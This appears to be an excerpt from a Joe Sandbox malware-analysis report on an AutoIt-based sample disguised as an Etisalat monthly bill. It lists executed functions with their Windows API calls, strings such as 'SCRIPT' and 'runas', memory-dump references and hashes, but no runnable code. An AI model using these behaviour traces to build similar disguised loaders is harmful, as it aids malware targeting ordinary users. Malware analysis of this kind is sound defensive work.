MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:26:05
Start date:	30/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	2.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	54

Executed Functions

Function 008A42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 008A430D

Part of subcall function 008A6B57: _wcslen.LIBCMT ref: 008A6B6A

GetCurrentProcess.KERNEL32(?,0093CB64,00000000,?,?), ref: 008A4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 008A4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 008A4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008A4466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 008A4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 008A447B
GetSystemInfo.KERNEL32(?,?,?), ref: 008A44A0

Strings

GetNativeSystemInfo, xrefs: 008A4460
kernel32.dll, xrefs: 008A444F
|O, xrefs: 008E36F8

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 794d1495c881c396c87b0e7d50999da0e225f83d8ad261feb4a2688160d11a09
Instruction ID: 34c6d4b4d64ff018d3b2c154c86b6efde23abbfb5f5cb840d979eaeddb6654e8
Opcode Fuzzy Hash: 794d1495c881c396c87b0e7d50999da0e225f83d8ad261feb4a2688160d11a09
Instruction Fuzzy Hash: B2A1C16393F2C4CFDB11CB7D7C451957FA4BB67304B0858A9E08DE3A62D2604988FB25

Function 008A42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,008A50AA,?,?,00000000,00000000), ref: 008A42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008A50AA,?,?,00000000,00000000), ref: 008A42C9
LoadResource.KERNEL32(?,00000000,?,?,008A50AA,?,?,00000000,00000000,?,?,?,?,?,?,008A4F20), ref: 008E35BE
SizeofResource.KERNEL32(?,00000000,?,?,008A50AA,?,?,00000000,00000000,?,?,?,?,?,?,008A4F20), ref: 008E35D3
LockResource.KERNEL32(008A50AA,?,?,008A50AA,?,?,00000000,00000000,?,?,?,?,?,?,008A4F20,?), ref: 008E35E6

Strings

SCRIPT, xrefs: 008A42BF

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 0c187d2bd7ac2d78adcdb4eaffe42c267372cee87725a9c5bddee3076656fd66
Instruction ID: 4e89bad700c7b2ea6c3cdd28a981bae32a6f817ccec0cdf9e2effeb5b867cd05
Opcode Fuzzy Hash: 0c187d2bd7ac2d78adcdb4eaffe42c267372cee87725a9c5bddee3076656fd66
Instruction Fuzzy Hash: 64118EB1240B01BFEB218B65DC48F277BB9FBC6B51F104169F412E6650DBB2DC009B20

Function 008E2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 008A2B6B

Part of subcall function 008A3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00971418,?,008A2E7F,?,?,?,00000000), ref: 008A3A78

Part of subcall function 008A9CB3: _wcslen.LIBCMT ref: 008A9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00962224), ref: 008E2C10
ShellExecuteW.SHELL32(00000000,?,?,00962224), ref: 008E2C17

Strings

runas, xrefs: 008E2C0B

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: a121d4f0aff6a47696cd44571f40869071d96a717c4da35582fbfda697f665cf
Instruction ID: f6f8bdc262a9ef7c06530b6c8f3691bb9061aa5a3531814e2b0e197e0bef7e31
Opcode Fuzzy Hash: a121d4f0aff6a47696cd44571f40869071d96a717c4da35582fbfda697f665cf
Instruction Fuzzy Hash: A911A23210C345ABE724FF6CE8519BE77A4FB93350F44542DF186D25A2CF20864A9713

Function 0090DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,008E5222), ref: 0090DBCE
GetFileAttributesW.KERNELBASE(?), ref: 0090DBDD
FindFirstFileW.KERNELBASE(?,?), ref: 0090DBEE
FindClose.KERNEL32(00000000), ref: 0090DBFA

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: f86c6d6d568ca98761d01c884ced6213696d7e5bb4423738f1127132d7a70f73
Instruction ID: 87f01e4b61461f32e0ae807371badf4dc1ce89bb2f9de3c32f2f719ab70db620
Opcode Fuzzy Hash: f86c6d6d568ca98761d01c884ced6213696d7e5bb4423738f1127132d7a70f73
Instruction Fuzzy Hash: D5F0A0718299305BD2206BB8AC0D8AB3BAC9E01334B104702F8B6D20E0EBB099549AD5

Function 008AD730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 008AD807
timeGetTime.WINMM ref: 008ADA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008ADB28
TranslateMessage.USER32(?), ref: 008ADB7B
DispatchMessageW.USER32(?), ref: 008ADB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008ADB9F
Sleep.KERNEL32(0000000A), ref: 008ADBB1

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 3af5b42e4cffe0c67153af8cf0efff3582317a74d30706daf08288641ab8fc53
Instruction ID: d07e2b6211c0c383ffa0e9bad99d82c12a026b30aa7108b8c45102aac3e3a762
Opcode Fuzzy Hash: 3af5b42e4cffe0c67153af8cf0efff3582317a74d30706daf08288641ab8fc53
Instruction Fuzzy Hash: 2142D170608749DFE728CF28C844BBABBE0FF46314F184559E596C7AA1D770E884DB92

Function 008A2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 008A2D07
RegisterClassExW.USER32(00000030), ref: 008A2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008A2D42
InitCommonControlsEx.COMCTL32(?), ref: 008A2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008A2D6F
LoadIconW.USER32(000000A9), ref: 008A2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008A2D94

Strings

+, xrefs: 008A2CF0
TaskbarCreated, xrefs: 008A2D37
AutoIt v3 GUI, xrefs: 008A2D23
0, xrefs: 008A2CE9

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: dc56582a461ae5ad0a389d4140b895260494a467d45d2a0cf4d066839c6c8c6a
Instruction ID: a37f747113f53d07f78b38ec784b9e85f509cf75d948de71e464f399af61351a
Opcode Fuzzy Hash: dc56582a461ae5ad0a389d4140b895260494a467d45d2a0cf4d066839c6c8c6a
Instruction Fuzzy Hash: 6921E5B6925308AFDB00DFA8E849BDDBBB4FB08700F00411AFA15B62A0D7B14584DF91

Function 008E065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008E039A: CreateFileW.KERNELBASE(00000000,00000000,?,008E0704,?,?,00000000,?,008E0704,00000000,0000000C), ref: 008E03B7

GetLastError.KERNEL32 ref: 008E076F
__dosmaperr.LIBCMT ref: 008E0776
GetFileType.KERNELBASE(00000000), ref: 008E0782
GetLastError.KERNEL32 ref: 008E078C
__dosmaperr.LIBCMT ref: 008E0795
CloseHandle.KERNEL32(00000000), ref: 008E07B5
CloseHandle.KERNEL32(?), ref: 008E08FF
GetLastError.KERNEL32 ref: 008E0931
__dosmaperr.LIBCMT ref: 008E0938

Strings

H, xrefs: 008E08BD

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: de1085bf407ff838a3cbf20ea49d0c017254c2cd9324bfa0cd4ce4e80205b4cc
Instruction ID: c580bf0209528ce911001f83992f5a6b904aeb51b771a49e380c538aa9337c3c
Opcode Fuzzy Hash: de1085bf407ff838a3cbf20ea49d0c017254c2cd9324bfa0cd4ce4e80205b4cc
Instruction Fuzzy Hash: ECA11332A141888FDF19AF68DC51BAE3BA1FB46324F14015DF815EB392C7719892DF92

Function 008A344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008A3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00971418,?,008A2E7F,?,?,?,00000000), ref: 008A3A78

Part of subcall function 008A3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008A3379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008A356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008E318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008E31CE
RegCloseKey.ADVAPI32(?), ref: 008E3210
_wcslen.LIBCMT ref: 008E3277
_wcslen.LIBCMT ref: 008E3286

Strings

Software\AutoIt v3\AutoIt, xrefs: 008A3560
\Include\, xrefs: 008A3527
Include, xrefs: 008E3184, 008E31C5
\, xrefs: 008E328C

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: ea886acbc0c701b089a336e37bd05624f23ec5f1759eaa365e6119005cdbee16
Instruction ID: 0868ee465603e562c74e826b9f0d0b2c80f7f4df1ddb0997e75ccee1a981f8c7
Opcode Fuzzy Hash: ea886acbc0c701b089a336e37bd05624f23ec5f1759eaa365e6119005cdbee16
Instruction Fuzzy Hash: B57192724283019ED714DF29DC8696BBBF8FF86B40F40442DF589D71A0EB749A88DB52

Function 008A2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 008A2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 008A2B9D
LoadIconW.USER32(00000063), ref: 008A2BB3
LoadIconW.USER32(000000A4), ref: 008A2BC5
LoadIconW.USER32(000000A2), ref: 008A2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008A2BEF
RegisterClassExW.USER32(?), ref: 008A2C40

Part of subcall function 008A2CD4: GetSysColorBrush.USER32(0000000F), ref: 008A2D07
Part of subcall function 008A2CD4: RegisterClassExW.USER32(00000030), ref: 008A2D31
Part of subcall function 008A2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008A2D42
Part of subcall function 008A2CD4: InitCommonControlsEx.COMCTL32(?), ref: 008A2D5F
Part of subcall function 008A2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008A2D6F
Part of subcall function 008A2CD4: LoadIconW.USER32(000000A9), ref: 008A2D85
Part of subcall function 008A2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008A2D94

Strings

#, xrefs: 008A2C16
0, xrefs: 008A2C0F
AutoIt v3, xrefs: 008A2C2F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: ea752a0876ffa23cb562fb371d847641a875192406ecf7dd72241e4b8395d134
Instruction ID: eeb1064cdc56fbcabc186672a7cf09d456364ffc12fcabceaaba49da084db606
Opcode Fuzzy Hash: ea752a0876ffa23cb562fb371d847641a875192406ecf7dd72241e4b8395d134
Instruction Fuzzy Hash: 43214FB6E28314AFDB109FA9EC55B9D7FB4FB48B50F00401AF509B66A0D7B14584EF90

Function 008A3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,008A316A,?,?), ref: 008A31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,008A316A,?,?), ref: 008A3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008A3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,008A316A,?,?), ref: 008A3232
CreatePopupMenu.USER32 ref: 008A3246
PostQuitMessage.USER32(00000000), ref: 008A3267

Strings

TaskbarCreated, xrefs: 008A322D

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: c6bd7e43c39209548ef8721dc30471972564bfa9e236f134257da0f373940483
Instruction ID: 40b7dfde508125f67e83528208606e3c16f7c6ae2373fa31768824d79ab12dcc
Opcode Fuzzy Hash: c6bd7e43c39209548ef8721dc30471972564bfa9e236f134257da0f373940483
Instruction Fuzzy Hash: 78415D72368208ABFF251B7CDC0EB793659F747345F044125FA0AD6AE1D7718E40ABA2

Function 008D8D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff7d6bc1dd154233c647956528c7e53448246442b2efb32782775d30731c2d69
Instruction ID: 6cdb25067f9b6e6ae582cfea465676cb85eab184fff78f7808dc396aa74cc7a1
Opcode Fuzzy Hash: ff7d6bc1dd154233c647956528c7e53448246442b2efb32782775d30731c2d69
Instruction Fuzzy Hash: 3BC1DE75A04249EFDB11AFACD841BADBBB5FF09310F04429AE958E7392CB309D41DB61

Function 01F42620 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01F426F1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01F42917

Memory Dump Source

Source File: 00000000.00000002.2025586288.0000000001F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f40000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
Instruction ID: e8b3fc95357f12f9cab46a184788d8c6f1f84d650a67d8cebfcf4af6837a6f26
Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
Instruction Fuzzy Hash: 63A10975E00209EBEB14CFA4D894BEEBBB5BF48304F208569F511BB281D7769A81CF54

Function 008A2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008A2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008A2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,008A1CAD,?), ref: 008A2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,008A1CAD,?), ref: 008A2CCF

Strings

edit, xrefs: 008A2CAC
AutoIt v3, xrefs: 008A2C89, 008A2C8E, 008A2C8F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 73ab4d942ea2aa239c8efbb5ed2956fcec79caa113d007102b1440ab4d2a6dd2
Instruction ID: c2ef3384ed1ca060ed0ffcb9456ae9ca997dcc37db48dda685e5f62640ae4c37
Opcode Fuzzy Hash: 73ab4d942ea2aa239c8efbb5ed2956fcec79caa113d007102b1440ab4d2a6dd2
Instruction Fuzzy Hash: 26F0DAB65643907BEB31172BAC09E773EBDD7C6F50F01405AF908A25A0C6611890EEB4

Function 01F423B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 159
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01F422A0: Sleep.KERNELBASE(000001F4), ref: 01F422B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01F42512

Strings

QY9R81MT05UR19XX2Z50O, xrefs: 01F42578, 01F4257B

Memory Dump Source

Source File: 00000000.00000002.2025586288.0000000001F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f40000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CreateFileSleep
String ID: QY9R81MT05UR19XX2Z50O
API String ID: 2694422964-3068552807
Opcode ID: 34d05d2c7cf7e1db9fa3eb020fbb9759b7cb720a7736267f8a8134c064358cb6
Instruction ID: c335386c29d24970e03790d8d506f99f7044d8bbe45d467170060a16a0a05d2a
Opcode Fuzzy Hash: 34d05d2c7cf7e1db9fa3eb020fbb9759b7cb720a7736267f8a8134c064358cb6
Instruction Fuzzy Hash: 7661A230D14248DBEF11DBE4D8547EEBB79AF59300F0041A9E609BB2C0D7BA1B45CBA6

Function 00912947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00912C05
DeleteFileW.KERNEL32(?), ref: 00912C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00912C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00912CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00912CC0

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 70d8b7aa022572c5609a87034d2fea8c3219b57b5380ba09a7f29e399a658880
